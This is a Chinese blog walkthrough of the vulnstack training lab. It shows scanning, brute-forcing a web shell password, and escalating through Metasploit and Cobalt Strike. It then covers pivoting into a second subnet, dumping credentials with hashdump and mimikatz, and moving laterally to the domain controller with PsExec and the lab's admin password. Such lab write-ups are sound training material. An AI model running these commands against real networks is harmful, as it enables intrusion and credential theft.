靶场操练 - getshell+横向渗透

admin 2024年1月29日22:42:44评论20 views字数 2562阅读8分32秒阅读模式

靶场信息

  • 作    者: 小星星                                

  • 创建时间: 2020年3月13日 02:52                           

  • 标    签:  APT攻击|Kill Chain|安全靶场|红蓝对抗|ATT&CK

  • 下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

  • win7账号密码:sunheart 123.com sunAdministrator dc123123.com

  • 2008账号密码:sunadmin 2021.com

  • Win7双网卡模拟内外网

  • 此处可以注意下,先把每个账号都登录下看下,因为密码过期的原因,后面可能导致实验不成功,密码过期的账户,你登录后会提示修改密码

  • 初始win7

    sunheart 123.com

    sunAdministrator dc123.com

    初始2008

    sunadmin 2020.com

渗透之路修仙之路

参考文章:https://mp.weixin.qq.com/s/FJokXBYWXCsQtB-9i0xUTw

靶场配置

导入win7和2008虚拟机,win7虚拟机1网卡设置NAT,设置网络自动获取IP,打开C盘下phpstudy

靶场操练 - getshell+横向渗透

渗透开始

扫描存活主机

arp-scan -l
masscan -p 80,22,3306,3389 192.168.44.0/24
nmap -sP 192.168.44.0/24

找到目标IP:192.168.44.132

靶场操练 - getshell+横向渗透

靶场操练 - getshell+横向渗透

扫描开放端口

nmap -sS -sV -v -p- -A 192.168.44.132

靶场操练 - getshell+横向渗透

得到信息:80、3306(mysql)

先用hydra爆破下3306,这条路好像是行不通

sudo hydra -l root -P /usr/share/john/password.lst 192.168.44.132 mysql

靶场操练 - getshell+横向渗透

目录扫描

这里还用dirb等扫过,没啥主要的

靶场操练 - getshell+横向渗透

访问网站,发现是ThinkPHP框架,通过访问不存在的路径达到报错效果,可以看到一些特征

靶场操练 - getshell+横向渗透

访问robots.txt也没什么信息

靶场操练 - getshell+横向渗透

访问index.php

靶场操练 - getshell+横向渗透

访问index.html

靶场操练 - getshell+横向渗透

访问add.php是个大马

靶场操练 - getshell+横向渗透

可以从这里入手,抓包爆破下密码

靶场操练 - getshell+横向渗透

爆出密码去登录下试试

靶场操练 - getshell+横向渗透

别有洞天

靶场操练 - getshell+横向渗透

依然信息收集,这个马子很多命令都没有回显所以肯定要换个方法

whoami

靶场操练 - getshell+横向渗透

也可以用工具看下thinkphp是否存在已知的漏洞

靶场操练 - getshell+横向渗透

靶场操练 - getshell+横向渗透

此处为了方便还是上传一个木马到webshell管理工具上

靶场操练 - getshell+横向渗透

靶场操练 - getshell+横向渗透

乱码问题改下编码

靶场操练 - getshell+横向渗透

简单的信息收集一下,补丁情况可以拿到http://blog.neargle.com/win-powerup-exp-index/看看

systeminfo

靶场操练 - getshell+横向渗透

靶场操练 - getshell+横向渗透

ipconfig /all

靶场操练 - getshell+横向渗透

显而易见肯定有域的(这不是废话嘛)

把shell弹回给MSF

靶场操练 - getshell+横向渗透

提权

getsystem
getuid

靶场操练 - getshell+横向渗透

前面知道有第二张网卡,那么接着整

MSF添加路由

run autoroute -s 192.168.138.0/24

靶场操练 - getshell+横向渗透

查看路由

run autoroute -p

靶场操练 - getshell+横向渗透

扫一下存活主机

run arp-scanner -r 192.168.138.0/24

靶场操练 - getshell+横向渗透

得到信息:192.168.138.138

设置sock5代理,我这里又出问题了。。。。哎。。。太菜了,有没有巨佬帮帮弟弟

use auxiliary/server/socks_proxy
set srvport 9050
vim /etc/proxychains4.conf

靶场操练 - getshell+横向渗透

扫描一下端口

use auxiliary/scanner/portscan/tcp

靶场操练 - getshell+横向渗透

得到信息:只开放了445端口

靶场操练 - getshell+横向渗透

使用MS17-010打一下试试看

use exploit/windows/smb/ms17_010_eternalblue

靶场操练 - getshell+横向渗透

不过失败了,不过也不要紧

先前有看到系统是64位的

靶场操练 - getshell+横向渗透

使用自带的hashdump抓取hash

run hashdump

靶场操练 - getshell+横向渗透

使用下mimikatz抓,进程需要先迁移到64位的

ps
migrate 452

靶场操练 - getshell+横向渗透

靶场操练 - getshell+横向渗透

此处输入?,可以看下kiwi

没有可以load mimikatz

靶场操练 - getshell+横向渗透

creds_all:列举所有凭据
creds_kerberos:列举所有kerberos凭据
creds_msv:列举所有msv凭据
creds_ssp:列举所有ssp凭据
creds_tspkg:列举所有tspkg凭据
creds_wdigest:列举所有wdigest凭据
dcsync:通过DCSync检索用户帐户信息
dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:创建黄金票据
kerberos_ticket_list:列举kerberos票据
kerberos_ticket_purge:清除kerberos票据
kerberos_ticket_use:使用kerberos票据
kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密码
wifi_list:列出当前用户的wifi配置文件
wifi_list_shared:列出共享wifi配置文件/编码
lsa_dump_sam

靶场操练 - getshell+横向渗透

kiwi_cmd sekurlsa::logonPasswords //抓取明文

靶场操练 - getshell+横向渗透

creds_all 效果也是一样的

靶场操练 - getshell+横向渗透

抓到了域用户,那么就可以尝试psexec传递了,MSF失败了。。。。。。愚昧。。。。正好换CS搞

通过CS来做

上传CS木马上线

靶场操练 - getshell+横向渗透

抓取明文

靶场操练 - getshell+横向渗透

CS多层内网上线

靶场操练 - getshell+横向渗透

设置防火墙规则

netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=9999

这里说明一下,搞了好久。。。一直报句柄无效,不过最后解决了。如果你也做了这个靶场,并且到这里出现和我一样的问题,可以后台私信我,看看能不能提供点帮助给你,我这里就不贴出来。

shell C:WINDOWSTempPsExec.exe -accepteula \192.168.138.138 - u Administrator -p dc123123.com -d -c C:WINDOWSTemp2222.exe

靶场操练 - getshell+横向渗透

剩下的挂代理就可以了,结束

靶场操练 - getshell+横向渗透

原文始发于微信公众号(Nurburgring):靶场操练 - getshell+横向渗透

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月29日22:42:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶场操练 - getshell+横向渗透http://cn-sec.com/archives/872800.html

发表评论

匿名网友 填写信息